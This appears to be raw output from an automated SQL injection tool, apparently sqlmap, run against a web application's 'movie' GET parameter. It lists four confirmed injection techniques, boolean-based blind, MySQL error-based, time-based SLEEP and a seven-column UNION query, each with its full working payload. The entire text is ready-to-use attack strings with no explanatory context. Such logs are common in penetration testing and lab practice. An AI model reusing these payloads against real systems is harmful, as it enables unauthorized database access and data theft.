Parameter: movie (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: movie=(SELECT (CASE WHEN (9326=9326) THEN 10 ELSE (SELECT 8690 UNION SELECT 5578) END))&action=go

    Type: error-based
    Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
    Payload: movie=10 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x716b7a7171,(SELECT (ELT(5440=5440,1))),0x716b767171,0x78))s), 8446744073709551610, 8446744073709551610)))&action=go

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: movie=10 AND (SELECT 3181 FROM (SELECT(SLEEP(5)))Zfmm)&action=go

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: movie=-5484 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716b7a7171,0x6754526d53527a7150446b55534a6c4f4b5148544b4b4d4f665849535664724b666b4a474e784c68,0x716b767171),NULL,NULL-- -&action=go
